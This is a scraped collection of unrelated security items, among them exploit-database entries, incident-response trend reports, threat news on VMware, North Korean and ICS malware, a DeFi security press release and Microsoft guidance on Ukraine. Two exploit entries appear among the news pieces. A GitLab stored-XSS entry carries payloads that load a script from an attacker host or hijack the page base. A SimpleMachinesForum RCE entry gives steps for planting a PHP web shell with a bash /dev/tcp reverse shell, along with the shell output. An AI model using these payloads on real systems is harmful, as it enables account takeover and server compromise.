Gitlab versions 14.9 prior to 14.9.2, 14.8 prior to 14.8.5, and 14.7 prior to 14.7.7 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: Gitlab Stored XSS# Date: 12/04/2022# Exploit Authors: Greenwolf & stacksmashing# Vendor Homepage: https://about.gitlab.com/# Software Link: https://about.gitlab.com/install# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2# Tested on: Linux# CVE : CVE-2022-1175# References: https://github.com/Greenwolf/CVE-2022-1175Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>Standard script include also works depending on the sites CSP policy. This is more stealthy.<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>

Gitlab 14.9 Cross Site Scripting

Ransomware continues as the top threat, while a novel increase in APT activity emerges




By Caitlin Huey.
Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

**Ransomware continues as the top threat, while a novel increase in APT activity emerges**

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_m4GPG0IRtDZT8UPmsyLr0gHPUOZG1xe-nqkh_-htxekZ2VwXvCDwQ8BYNRdgArcMmYzlZFnuF0jeHt6cX635yT0RoREd4bm8DmU2JUzXrdw3rsGmOB8tMP6AvQ1RHXqXJXrFF_aM73nFmVAh8Q3U1yVoIP7sM9E5QwxT2wmK99_PaSTG7iyWXvVm/s16000/TIR_quarterly_trends_banner.jpg)

_By Caitlin Huey._

Ransomware was still the top threat Cisco Talos Incident Response (CTIR) saw in active engagements this quarter, continuing a trend that started in 2020. As mentioned in the 2021 year-in-review report, CTIR continues to deal with an expanding set of ransomware adversaries and major cybersecurity incidents affecting organizations worldwide.  

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUDkQFdigkJg7M2nBf3gqfEKhHJO6U55wD02LN9awloHiV14wGiJp9DeUDcT8UHImiNQsCzeR08Omtjk6FCRRyYYrRg4ffp-oVJ793zZLouMKN3LHw8G0JAoUG_VtyM_3C-yISYFTlWoTN7Uc0DAUawRa3FyPe6Rz4XBddpnrDWdE8aSqRv3HRC_mL/w200-h48/blog-onepager-button.jpg)

The first quarter of 2022 also featured an increase in engagements involving advanced persistent threat (APT) activity. This included Iranian state-sponsored MuddyWater APT activity, China-based Mustang Panda activity leveraging USB drives to deliver the PlugX remote access trojan (RAT), and a suspected Chinese adversary dubbed “Deep Panda” exploiting Log4j. 

**Targeting**

A wide variety of verticals were targeted, including education, energy, financial services, health care, industrial production and equipment, local government, manufacturing, real estate, telecommunications and utilities. The top targeted vertical was telecommunications, following a trend where it was among the top targeted verticals in the previous quarter, closely followed by organizations in the education and government sectors. 

**Threats**

Ransomware continued to comprise the majority of threats CTIR responded to. No one ransomware family was observed twice in incidents that closed out this quarter. This is indicative of a trend toward greater democratization of ransomware adversaries that Talos began observing last year. This quarter also saw the appearance of emerging ransomware families, including Cerber (aka CerberImposter), Entropy and Cuba. There were also high-profile ransomware families, such as Hive and Conti. 

CTIR observed ransomware adversaries exfiltrating sensitive data supporting double extortion as another method to further compel victims to pay the ransom, a continuation of a trend that began in the winter of 2019. For example, in an Entropy ransomware engagement affecting a local government organization, CTIR identified traffic and activity associated with mega\[.\]nz, a utility commonly used for file transfer and data exfiltration. It was first observed executing from the following path: "C:\\Users\\admin\\AppData\\Local\\MEGAsync\\MEGAsync.exe".  

After ransomware, the next most commonly observed threat this quarter included exploitation of Log4j, the Apache logging utility commonly used by organizations globally. Adversaries have continued to exploit Log4j (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) since the security flaws were initially published in December 2021. In January 2022, CTIR started to observe a growing number of engagements in which adversaries are attempting to exploit Loj4j in vulnerable VMware Horizon servers. 

In one engagement affecting an education institution, CTIR found evidence of PowerShell scripts including a line that killed the process “ws\_TomcatService.exe”, a key parent process in commonly observed malicious Log4j activity. The combination of the timeframe and the unpatched, vulnerable state of the VMware Horizon server suggests that Log4j exploitation was a probable root cause of the compromise. The adversary also installed cryptocurrency miners; conducted reconnaissance with Bloodhound, an application used to enumerate relations within Active Directory (AD); created at least one local “DomainAdmin” account; and leveraged remote desktop protocol (RDP) for potential lateral movement. 

**Advanced persistent threats**

As mentioned above, CTIR observed a novel increase in APT activity in engagements compared to previous quarters. This includes activity associated with Iranian state-sponsored MuddyWater, China-based Mustang Panda deploying the PlugX RAT, and a suspected Chinese state-sponsored actor dubbed Deep Panda leveraging Log4j. 

For example, a health care organization was affected by threat activity associated with Deep Panda in which the adversary exploited Log4j to deploy a custom backdoor. CTIR initially observed a PowerShell command that downloaded three additional files — “1.bat”, “syn.exe” and “l.dll” — from the attacker’s server, which has been linked to the adversary by other security firms. The PowerShell script executes “1.bat,” which subsequently executes “syn.exe” and proceeds to delete all three files from the disk. The “syn.exe” file creates a service set to autorun and is launched via “svchost.exe”. The “1.dll” file is packed with Themida, which is used to detect monitoring programs that may be used for malware reversing.    

In another engagement affecting a telecommunications organization, CTIR’s research provided moderate to high confidence that several of the indicators of compromise (IOCs) and tactics, techniques and procedures (TTPs) discovered were linked to Mustang Panda. The initial compromise was determined to be due to a malware-infected USB connected to corporate resources that subsequently deployed PlugX, a RAT commonly deployed by Mustang Panda that steals credentials from compromised machines. After the USB was connected to the corporate environment for approximately one hour, a hidden directory was created within “C:\\ProgramData” containing files associated with PlugX. The variant can uniquely spread via USB, which distinguishes it from other PlugX variants. This PlugX variant creates a hidden folder named “RECYCLE.BIN” and copies three files: a benign EXE, a loader DLL and an encrypted DAT file. The malware hides all of the folders in the root directory and creates LNK files for each one in order to deceive the victim. In this instance, the malware used legitimate Avast-signed executables to sideload a malicious PlugX DLL.  

**Initial vectors**

For the majority of engagements, identifying an initial vector was difficult due to shortfalls in logging and visibility. However, in engagements in which the initial vector could be confirmed, or reasonably assumed, this quarter featured a number of engagements where adversaries exploited public-facing applications that were vulnerable to Log4j. For example, in one engagement affecting a telecommunications company, CTIR observed a large number of PowerShell download requests to an IP address associated with Log4j exploitation attempts against vulnerable VMware Horizon servers. Following this activity, high CPU usage was detected on a VMware Horizon server, leading to the identification of several clusters of cryptocurrency miners, consistent with typical cryptocurrency miner threat actor behavior following the release of high-profile vulnerabilities.

In a Cerber ransomware incident affecting a holding company, the adversary used vulnerabilities affecting GitLab (CVE-2021-22204 and CVE-2021-22205) to upload and execute code remotely, ultimately granting unauthorized access to that system in the context of the "git" account. This is consistent with reporting from other security firms on a new version of Cerber ransomware targeting Atlassian Confluence and GitLab servers with older RCE vulnerabilities. The adversary attempted to expand access through privilege escalation and lateral movement and ultimately executed ransomware.  

**Security weaknesses**

The top recommendation that responders have for organizations is to implement multi-factor authentication (MFA) on all critical services, including endpoint detection response (EDR) solutions. MFA is an effective way to prevent adversaries from gaining unwanted access, and we routinely see threat activity that could have been prevented if MFA had been enabled.  

In one engagement that kicked off this quarter affecting a telecommunications company involving pre-ransomware TTPs, the adversary compromised the organization’s help desk/call center partner company. This was identified as the root cause of the compromise due to the third party having access to the organization’s Citrix machines while not enabling MFA. CTIR recommends that all third parties in the environment are following MFA security policies and guidelines.

**Top-observed MITRE ATT&CK techniques**

Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.

Key findings from the MITRE ATT&CK appendix include: 

*   We observed an increase in engagements in which initial access was achieved via phishing with a malicious link or document that relied upon subsequent user execution. Compared to last quarter, we observed more threats leveraging social engineering techniques, as well as masquerading as legitimate files or utilities to entice users to click or execute a given link or file.
*   Due to the number of engagements responders supported that exploited Log4j, we observed an increase in techniques relying on exploiting unpatched and vulnerable public-facing applications. This coincides with our observations of adversaries capitalizing on organizations’ lack of up-to-date patches and improper data protections.
*   We saw a large increase in defense evasion and collection techniques compared to previous quarters. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details about certain hosts that could be used for targeting, keylogging to access credentials in the browser, and selecting particular files of interest for possible exfiltration.  
*   Consistent with last quarter’s findings, we continued to see a reliance on utilities such as PsExec and Cobalt Strike and a variety of remote access software, such as TeamViewer and ScreenConnect, to facilitate remote access. 

Tactic

Technique

Example

Initial Access (TA0001)

T1190 Exploit Public-Facing Application

Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet.

Reconnaissance (TA0043)

T1592 Gather Victim Host Information

Malicious file contains details about host

Persistence (TA0003)

T1053 Scheduled Task/Job

Scheduled tasks were created on a compromised server

Execution (TA0002)

T1059.001 Command and Scripting Interpreter: PowerShell

Executes PowerShell code to retrieve information about the client's Active Directory environment

Discovery (TA0007)

T1087 Account Discovery

Use a utility like ADRecon to enumerate information on users and groups

Credential Access (TA0006)

T1003.001 OS Credential Dumping: LSASS Memory

Use “lsass.exe” for stealing password hashes from memory

Privilege Escalation (TA0004)

T1574.002 Hijack Execution Flow: DLL Side-Loading

A malicious PowerShell script attempted to side-load a DLL into memory

Lateral Movement (TA0008)

T1021.001 Remote Desktop Protocol

Adversary made attempts to move laterally using Windows Remote Desktop

Defense Evasion (TA0005)

T1027 Obfuscated Files or Information

Use base64-encoded PowerShell scripts

Command and Control (TA0011)

T1219 Remote Access Software

Remote access tools found on the compromised system

Impact (TA0040)

T1486 Data Encrypted for Impact

Deploy Conti ransomware and encrypt critical systems

Exfiltration (TA0010)

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Actor exfiltrated data to file sharing site mega\[.\]nz

Collection (TA0009)

T1114.003 Email Collection: Email Forwarding Rule

Adversary used a compromised account to create a new inbox rule to place emails in a folder

Software/Tool

S0029 PsExec

Adversary made use of PsExec for lateral movement

Quarterly Report: Incident Response trends in Q1 2022

Apostro's system will monitor all transactions to identify malicious behavior that can cause damage to DeFi protocols.

WARSAW, Poland, April 26, 2022 /PRNewswire/ -- Apostro is a recently established European startup building a risk management platform to improve the economic security of DeFi protocols. It offers a fresh approach to DeFi security by implementing proven risk management practices and tools from traditional finance.

Many DeFi projects have become victims of exploits, losing millions of USD worth of crypto every year. The first quarter of 2022 is already setting a new record with $1.3 billion stolen in illicit transactions. While the total value locked in DeFi has already surpassed $200 billion, loopholes in the infrastructure and deficiency of risk management tools allow bad actors to steal money. This stalls DeFi adoption as institutions and big players want more security assurances before considering the space as a safe portfolio diversification option.

Currently, DeFi protocols rely on audits of their smart contracts, but this practice is insufficient when dealing with economic threats. Stress testing and formal verification can simply miss a potential logic backdoor, which gives hackers a way to steal funds by exploiting economic opportunities rather than technical weaknesses.

To deal with such threats, Apostro is building a system that will analyse smart contracts' business logic and typical interactions with the protocol by an average user. It will monitor all transactions to identify malicious behaviour that can cause damage to the protocol.

Apostro can also prevent or delay an exploit by complicating its execution by setting limits on the amount of available liquidity in one block or transaction. Simultaneously, it will alert the developers of any threats to a protocol's security, allowing them to take necessary measures to mitigate the negative impact.

_'We help minimise the impact of economic attacks on DeFi systems. Technical attacks are more or less sorted out by now: there are many good auditors, and most issues are relatively easy to catch. With economic issues, however, there are no ideal solutions available yet,'_ \- states Tim Ismiliaev, founder and CTO at Apostro.

**About Apostro**

Apostro is a risk management platform designed to track, mitigate and prevent economic smart contract exploits. Headquartered in Warsaw, Apostro utilises proven risk management practices with onchain and market data analysis to enhance security of Web3 protocols.

Introducing Apostro: A Risk Management Platform for Web3 Security

Threat actor is using the flaw to deliver Core Impact backdoor on vulnerable systems, security vendor says.

An Iranian cyber espionage group that some vendors track as Rocket Kitten has begun exploiting a recently patched critical vulnerability in VMware Workspace ONE Access/Identity Manager technology to deliver the Core Impact penetration testing tool on vulnerable systems.

VMware disclosed the remote code execution vulnerability (CVE-2022-22954) on April 6, the same time it released a patch for the issue along with fixes for a total of seven other — somewhat less critical — vulnerabilities that were privately reported to the company. VMware identified the RCE vulnerability as a server-side template injection issue that could be used for remote code execution. The software vendor assigned it a severity ranking of 9.8 on a scale of 10 because the flaw, among other things, allows attackers to gain the highest privileged access in compromised environments.

Days after the flaw was disclosed, proof-of-exploit code for it became publicly available on Twitter. Shortly thereafter, threat actors reportedly began attacking the flaw to install cryptocurrency coin miners on vulnerable servers.

Among those that began exploiting the flaw on Apr. 14 and 15 were attackers who used it to gain access to vulnerable networks and launch reverse HTTPS backdoors such as Core Impact, Cobalt Strike, and Metasploit beacons, Morphisec said in a report Monday. The tactics, techniques and procedures of the attackers suggested a link to Rocket Kitten, the security vendor said.

"Many groups appear to be exploiting this vulnerability, but there are not many groups deploying stolen Core Impact implants," says Michael Gorelik, CTO and head of threat research at Morphisec. "The US customer that we saw targeted here is one that has an outreach to many US customers. Unfortunately, we can't share any more details on that currently."

Morphisec has approached Core Security to validate the existence of the watermark within the implant, he says.

The presence of the Core Impact backdoor on the targeted network, he says, is an indication that an APT group was behind it, simply because of how rarely the backdoor has been used by others.

**Ransomware Risk**  
Morphisec described the new vulnerability as a server-side template injection in an Apache Tomcat component of VMware's Workspace ONE Access/Identity Manager that allows remote commands to be executed on the hosting server. The flaw greatly heightens the risk of ransomware attacks and significant security breaches for organizations using the vulnerable technology, the security vendor said.

VMware Workspace ONE Access was previously known as VMware Identity Manager. The technology is designed to give enterprises a way to quickly implement multifactor authentication, single sign-on, and conditional access policies for workers attempting to access enterprise SaaS, mobile, and Web application environments. "It is an identity provider and manager," Gorelik says. "It has access to all the organizational users and acts as access control to the environment."

Morphisec said several vulnerabilities have been disclosed in the VMware technology recently, including two other RCE flaws, CVE-2022-22958 and CVE-2022-22957. While both of these flaws are remotely executable, the attacker would need to have gained administrative access to the vulnerable server first. However, the new flaw from earlier this month does not require attackers to have this level of access to exploit it, Morphisec said.

**PowerShell in the Mix**  
In the attack that Morphisec observed, the attacker — after gaining initial access to the vulnerable system — deployed a PowerShell stager on it that in turn downloaded a highly obfuscated PowerShell script called PowerTrash Loader. The loader then loaded a Core Impact agent in system memory without leaving a trace of forensic evidence.

Gorelik says Morphisec researchers have previously observed APT groups such as Russia's FIN7 use PowerTrash Loader to upload remote-access Trojans such as JSSLoader on target systems in other campaigns.

"The PowerShell command is executed as a direct command sent through server-side template injection," Gorelik says. "The command is an obfuscated PowerTrash downloader that eventually deployed the Core Impact backdoor."

Organizations that implement VMware's patch for the flaw should be protected against it, he says. VMware's advisory noted the flaw is being actively exploited and pointed to workarounds for mitigating the threat for organizations that are not able to immediately patch against it.

Iranian Hacking Group Among Those Exploiting Recently Disclosed VMware RCE Flaw

Spear-phishing campaign loaded with new "Goldbackdoor" malware targeted journalists with NK News, analysts found.

New analysis has attributed a spear-phishing campaign targeting journalists covering North Korea to APT37/Ricochet Chollimia, a state-backed group linked to the Democratic People's Republic of Korea (DPRK). Notably, researchers said the group is deploying a novel malware strain called Goldbackdoor, a variation of Bluelight malware previously attributed to APT37.

According to a report from researchers at Stairwell, multiple phishing emails were sent to NK News on Mar. 18 that appeared to be from the personal email address of the previously compromised former head of of the South Korean National Intelligence Service, and contained Goldbackdoor malware. NK News handed over the information to Stairwell for further investigation, the cybersecurity firm said.

"Due to the sensitive nature of journalists' work, they are often targets of surveillance and malware, intent on stealing information, ferreting out sources or even destroying evidence and scaring the reporters into not publishing stories," Erich Kron, security awareness advocate at KnowBe4, said in response to the news. "In regimes like North Korea, where news is tightly controlled by the state, articles or information that paints the leadership or government in a negative light is treated as a serious threat to national security."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

North Korean State Actors Deploying Novel Malware to Spy on Journalists

Mandiant data also shows a dramatic drop in attacker dwell time on victim networks in the Asia-Pacific region — to 21 days in 2021 from 76 days in 2020.

The length of time attackers remained undetected on a victim's network decreased for the fourth year in a row, sinking to 21 days in 2021, down from 24 days in 2020, according to a new report on incident response (IR) investigations conducted by Mandiant.

Mandiant in its IR cases found that companies have tuned their detection capabilities to find the most dangerous attacks quickly, with ransomware detected within five days on average; non-ransomware attacks remained active for 36 days in 2021, down from 45 days in 2020. But the quicker detection of ransomware attacks may not necessarily be positive, instead being due to the activation of the payload, says Steven Stone, senior director of adversary operations for Mandiant.

In general, however, the improvement is driven by faster detection of non-ransomware threats because more companies are working with third-party cybersecurity firms, and government agencies and security firms often notify victims of attacks, leading to faster detection, he says.

"We think the combination of factors like these contributes to what we already see as year-over-year improvements in these regions," Stone says. "Ultimately, initial threat vectors come down to attacker choices and the availability of different vulnerabilities. Overall, we see some attack groups use different methods concurrently, likely showing a preference per target efforts."

Companies have improved their detection times dramatically over the past decade, reducing the time to detect attackers by nearly a factor of 20, from 418 days in 2011 to 21 days in 2021, according to the Mandiant M-Trends 2022 report.

    

Source: Mandiant

The improvement in company's detection capabilities varied significantly by region, with firms in the Asia-Pacific region seeing a dramatic drop in so-called "dwell time" to 21 days in 2021, from 76 days in 2020. European companies also saw a significant decrease to 48 days, from 66 days in 2020, while North American companies' detection did not change, staying level at 17 days.

**Attackers Love Cobalt Strike**  
The most popular attack tool remained the Beacon backdoor, which accounted for 28% of all identified malware families. Beacon is a component of the Cobalt Strike penetration testing tool, which is also popular with malicious attackers. Other attack tools quickly dropped off in frequency and include the Sunburst backdoor for .NET environments, the Metasploit penetration testing platform, and SystemBC, a proxy toolkit.

Overall, two methods of initial compromise — exploiting vulnerabilities and attacks through the supply chain — accounted for 54% of all attacks with an identified initial infection vector in 2021, up from less than a 30% share of attacks in 2020, according to Mandiant. The changing tactics underscore that companies need to keep informed of attackers' techniques, Jurgen Kutscher, executive vice president for service delivery at Mandiant, said in a statement announcing the report.

"In light of the continued increased use of exploits as an initial compromise vector, organizations need to maintain focus on executing on security fundamentals — such as asset, risk, and patch management," he said. "The key to building resilience lies in preparation. Developing a robust preparedness plan and well-documented and tested recovery process can help organizations successfully navigate an attack and quickly return to normal business operations."

**Active Directory in the Bullseye**  
In another trend, attackers are increasingly taking aim at hybrid Active Directory (AD) installations, because misconfigurations in the hybrid identity model — where credentials and keys are synchronized between on-premises AD services and Azure Active Directory in the cloud — lead to compromises, Mandiant stated in the report.

Companies should treat hybrid Active Directory servers as the most sensitive level of assets, tier 0, and only allow access from privileged workstation from a segmented network. Along with monitoring, these steps should make exploitation much more difficult, says Evan Pena, managing director of Mandiant's global red team.

Luckily, implementing best security practices for hybrid AD servers is not hard to get right, he says.

"As companies move their resources to the cloud while using hybrid models, attackers will target these hybrid servers to achieve both domain and cloud compromise," he says. "It is common for these hybrid servers to have high-level privileges to on-premises servers — \[such as\] domain controllers — and cloud resources."

Companies should be tackling the primary threat this year by reviewing and assessing their Active Directory implementation for vulnerabilities or misconfigurations, understanding how to detect and prevent unusual lateral movement attempts in their environment, and implementing application whitelisting and disabling macros to significantly limit initial access attacks, says Pena.

More Than Half of Initial Infections in Cyberattacks Come Via Exploits, Supply Chain Compromises

The recent discovery of highly customized malware targeting programmable logic controllers has renewed concerns about the vulnerability of critical infrastructure.

The US Cybersecurity and Infrastructure Security Agency (CISA), along with the NSA, FBI, and others, this week urged critical infrastructure organizations — especially in the energy sector — to implement defenses against a set of highly sophisticated cyberattack tools designed to target and disrupt industrial environments.

The warning applies particularly to ICS and OT networks using programmable logic controllers (PLCs) from Schneider Electric and Omron and servers based on Open Platform Communications Unified Architecture (OPC UA). The advisory was prompted by the recent discovery of three malware tools custom-built to target these technologies and manipulate them in dangerous and potentially destructive ways. However, the malware can be adapted to attack other ICS technologies as well.

CISA's advisory contained a series of mitigation measures that it recommended organizations implement proactively to reduce exposure to the new threat.

Mandiant analyzed the new attack tools recently in partnership with Schneider and is collectively tracking them under the name INCONTROLLER. In a report this week, the security vendor described the malware as having an "exceptionally rare and dangerous" capability and posing a critical risk to organizations that use the targeted equipment. Mandiant compared INCONTROLLER to previous ICS-specific threats such as Stuxnet, which was used to destroy hundreds of centrifuges at an Iranian nuclear-enrichment facility in 2010, and Industroyer, which caused a power outage in Ukraine in 2016.

**Work of a Russian State-Sponsored Group?**  
"We believe INCONTROLLER is very likely linked to a state-sponsored group given the complexity of the malware, the expertise and resources that would be required to build it, and its limited utility in financially motivated operations," says Rob Caldwell, director of industrial control systems and operational technology at Mandiant. He says Mandiant has been unable to associate the malware with any previously tracked group but believes those behind it are most likely Russia-linked. "While our evidence connecting INCONTROLLER to Russia is largely circumstantial, we note it given Russia's history of destructive cyberattacks, its current invasion of Ukraine, and related threats against Europe and North America."

Mandiant identified one of the attack tools as "Tagrun," a tool for scanning OPC environments, enumerating OPC servers, harvesting data from them, and brute-forcing credentials. The security vendor identified the tool as likely used for conducting reconnaissance on industrial networks. Mandiant has dubbed the second tool as "Codecall," which it described as a framework that uses two common industrial protocols — Modbus and Codesys — to communicate and interact with at least three Schneider PLCs. The malware can identify Schneider and other Modbus-enabled devices on a network and connect to them using the two protocols. The third tool, "Omshell," targets Omron PLCs via HTTP, Telnet, and a proprietary Omron protocol. It is designed to interact with a mechanism on Omron devices for monitoring the safe running of so-called servo motors used in industrial applications. The malware can gain shell access to Omron PLCs and take a variety of malicious actions, including wiping device memory, resetting a device, loading backup data, and executing arbitrary code on it.

Collectively the malware tools have capabilities that allow attackers to surveil and collect data from target industrial environments that they can then use to identify high-value systems and to launch potentially catastrophic attacks against them in industrial settings. Potential attack scenarios include threat actors using Omshell and/or Codecall to crash targeted PLCs and disrupt operations; sending malicious commands to PLCs to sabotage industrial processes; or disabling safety controllers to cause physical destruction in a plant or industrial setting.

"The components of INCONTROLLER contain more sophisticated methods of interacting with and attacking or modifying the targeted devices than seen in previous ICS-specific malware," Caldwell says. These components are designed to make interaction with PLC devices easy for attackers with little detailed knowledge of the targeted ICS protocols. "Further, these components are modular and could be extended to target additional devices or add additional capabilities," he says.

Mandiant said it is also tracking two other tools targeted at Windows-based systems that appear to be related to INCONTROLLER activity. One of them exploits a known vulnerability, CVE-2020-15368, to install and exploit a vulnerable driver on target systems, and the other is a backdoor that enables reconnaissance activity. The tools could be used to support a threat actor's broader goals in an industrial cyberattack, Mandiant said.

**A Clear and Present Danger to Industrial Environments**  
ICS security vendor Dragos listed a total of 16 devices and software tools from Omron and Schneider that it said the malware was designed to interact with and exploit. The technologies are used in a wide range of industry verticals. But Dragos said its analysis of the malware suggests it is targeted mostly at equipment in liquefied natural gas (LNG) and electric power environments.

Dragos is collectively tracking the attack tools as "PIPEDREAM" and the threat actors behind it as "CHERNOVITE." A whitepaper that the company released this week on the threat identified the threat actor as having the ability — among other things — to manipulate the torque and speed of Omron servo motors in a way that could cause enough physical destruction to result in loss of life. Dragos' whitepaper listed several other malicious actions that threat actors could use the malware for, including triggering denial of control and denial for view for ICS operators; disrupting operating technology by masquerading as a trusted process; disabling process controllers to extend time-to-recovery from an incident; and undermining authentication and encryption mechanisms in OT environments.

"PIPEDREAM is a clear and present threat to the availability, control, and safety of industrial control systems and processes endangering operations and lives," Dragos said.

News of the malware tools comes just days after reports of Ukraine's computer emergency response team (CERT-UA) thwarting an effort by Russia's Sandworm group to disrupt the country's power grid using Industroyer, one of the first known malware tools targeted specifically at the electric grid. So far, researchers have discovered at least seven highly sophisticated ICS-specific attack tools, which include Stuxnet, Industroyer, Triton, and BlackEnergy.

Danielle Jablanski, OT cybersecurity strategist at Nozomi Networks, says the combined tools in this case were built to search for specific devices, to understand their operational parameters, to gain credentialed access, and to remotely control various legitimate functions of the devices for their intended objectives. "These are customizable based on the devices targeted but can be modified to target additional devices that leverage the same protocols," she says.

Jablanski says that options for thwarting attacks become scarce when threat actors have the credentials and know how to use devices based on their design, protocols, and features.

It's presently unclear in what host environment the newly discovered tools were found. But typically, some stop-gap measures for mitigating exposure to the threat would include disabling unnecessary functionality, introducing access controls to limit legitimate users who communicate with the device, and taking password management seriously. "Device hardening to limit the susceptibility and severity of cyber incidents is a staple of defense in depth strategies across ICS/OT environments," she says.

Eric Byres, CEO of aDolus Technology, says the new tools highlight a recent trend away from previous attacks where threat actors gained access to an OT environment by leapfrogging to it from the IT network. Those kinds of attacks have become less common with many organizations tightening OT security. So, sophisticated attackers are finding other ways to establish access to their victims' OT networks, he says pointing to Stuxnet as an example.

"Stuxnet did it through a combination of infected USB flash drives, printer sharing, and modified PLC logic files," he says. Similarly, Dragonfly, which was Russian in origin, attacked the manufacturers of OT control equipment and replaced the software they supplied to their industrial customers with trojanized versions.

"These supply chain-driven attacks are now becoming the preferred method for nation-state attackers, especially the Russian spy agencies," Byres says. "By going after OT suppliers rather than the OT systems directly, they get tremendous multiplication effects."

New Malware Tools Pose 'Clear and Present Threat' to ICS Environments

SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in SimpleMachinesForum 2.1.1

\# Remote Code Execution in SimpleMachinesForum 2.1.1 and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 7th March 2022

\# CVE ID: CVE-2022-26982

\# Confirmed on release 2.1.1

\# Vendor: https://download.simplemachines.org/

\# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!

###############################################

#Step1- Login with Admin Credentials

#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php

#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>

#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page

#Step5- Now click on "Themes and Layout" and you will get the reverse shell:

E.g: Visit http://IP\_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:

listening on \[any\] 4477 ...

connect to \[192.168.56.1\] from (UNKNOWN) \[192.168.56.130\] 41276

bash: cannot set terminal process group (1334): Inappropriate ioctl for device

bash: no job control in this shell

daemon@debian:/opt/bitnami/simplemachinesforum$ whoami

whoami

daemon

daemon@debian:/opt/bitnami/simplemachinesforum$ id

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

daemon@debian:/opt/bitnami/simplemachinesforum$

CVE-2022-26982: 0days/Exploit.txt at main · sartlabs/0days

UPDATE 27 Apr 2022: See Updated malware details and Microsoft security product detections below as discussed in the Special Report: Ukraine.
UPDATE 02 MAR 2022: See Updated malware details and Microsoft security product detections below for additional insights and protections specific to the evolving threats we have identified impacting organizations with ties to Ukraine.

**UPDATE 27 Apr 2022:** See **_Updated malware details and Microsoft security product detections_** below as discussed in the **Special Report: Ukraine**.

**UPDATE 02 MAR 2022:** See **_Updated malware details and Microsoft security product detections_** below for additional insights and protections specific to the evolving threats we have identified impacting organizations with ties to Ukraine.

Microsoft has been monitoring escalating cyber activity in Ukraine and has published analysis on observed activity in order to give organizations the latest intelligence to guide investigations into potential attacks and information to implement proactive protections against future attempts.

We’ve brought together all our analysis and guidance for customers who may be impacted by events in Ukraine into this single location for ease of consumption, all of which is linked below. In this blog, we’ve also included general security guidance for organizations to build cyber resilience. As the situation in the region develops, we will continue to publish new insights and add to this set of resources.

Microsoft has been notifying customers in Ukraine of activity, where possible, and closely coordinating with the government in Ukraine. This support is ongoing.

We have also summarized information about what we are doing around protecting organizations in Ukraine from cyberattacks; protecting against state-sponsored disinformation campaigns; supporting humanitarian assistance; and protecting our employees: Digital technology and the war in Ukraine.

**Published Microsoft analysis of malicious activity in Ukraine**

_Phishing attacks on Ukrainian soldiers:_

*   February 25, 2022 | RiskIQ: UNC1151/GhostWriter Phishing Attacks Target Ukrainian Soldiers

_Recent disk wiping attacks:_

*   February 24, 2022 | RiskIQ: HermeticWiper Compromised Server Used in Attack Chain

_Advanced threat actor ACTINIUM which has consistently pursued access to organizations in Ukraine or entities related to Ukraine affairs:_

*   February 4, 2022 | Microsoft Security Blog: ACTINIUM targets Ukrainian organizations
*   February 4, 2022 | RiskIQ threat intelligence article: ACTINIUM targets Ukrainian organizations
*   February 4, 2022 | Microsoft Threat Analytics article (requires a license): Threat Insights: ACTINIUM targets Ukrainian organizations

_Destructive malware operation and malware family known as WhisperGate targeting multiple organizations in Ukraine:_

*   January 15, 2022 | Microsoft on the Issues Blog: Malware attacks targeting Ukraine government
*   January 15, 2022 | Microsoft Security Blog: Destructive malware targeting Ukrainian organizations
*   January 15, 2022 | RiskIQ threat intelligence article: Destructive malware targeting Ukrainian organizations

OSINT (open source intelligence) articles around activity in Ukraine are published regularly into the RiskIQ Community. The full list is available here: RiskIQ Community articles on Ukraine activity.

**Security guidelines and recommendations**

We recommend that customers review their security posture and implement best practices to build resilience against today’s threats. Below are recommendations and links to resources:

1.  **Cybersecurity hygiene:** Organizations should harden all systems by following basic principles of cyber hygiene to proactively protect against potential threats. Microsoft recommends taking the following steps:

*   Enable multifactor authentication
*   Apply least privilege access and secure the most sensitive and privileged credentials
*   Review all authentication activity for remote access infrastructure
*   Secure and manage systems with up-to-date patching
*   Use anti-malware and workload protection tools
*   Isolate legacy systems
*   Enable logging of key functions
*   Validate your backups
*   Verify your cyber incident response plans are up to date

